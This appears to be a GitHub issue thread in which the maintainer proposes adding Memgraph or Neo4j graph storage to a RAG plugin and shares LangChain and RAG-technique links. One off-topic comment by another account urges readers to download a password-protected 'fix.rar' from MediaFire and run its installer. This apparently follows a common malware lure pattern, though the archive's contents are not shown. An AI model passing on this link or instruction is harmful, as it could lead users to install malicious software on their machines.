### ISSUE TITLE
implement memgraph and/or neo4j for tabular and similar data

### ISSUE THREAD

**Issue by BBC-Esq** [BBC-Esq/VectorDB-Plugin-for-LM-Studio#274]
https://python.langchain.com/v0.2/docs/integrations/graphs/memgraph/

https://api.python.langchain.com/en/latest/graphs/langchain_community.graphs.memgraph_graph.MemgraphGraph.html#langchain_community.graphs.memgraph_graph.MemgraphGraph

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by BBC-Esq** [comment]
https://github.com/NirDiamant/RAG_Techniques/blob/main/all_rag_techniques/Microsoft_GraphRag.ipynb

https://github.com/NirDiamant/RAG_Techniques/blob/main/all_rag_techniques_runnable_scripts/graph_rag.py
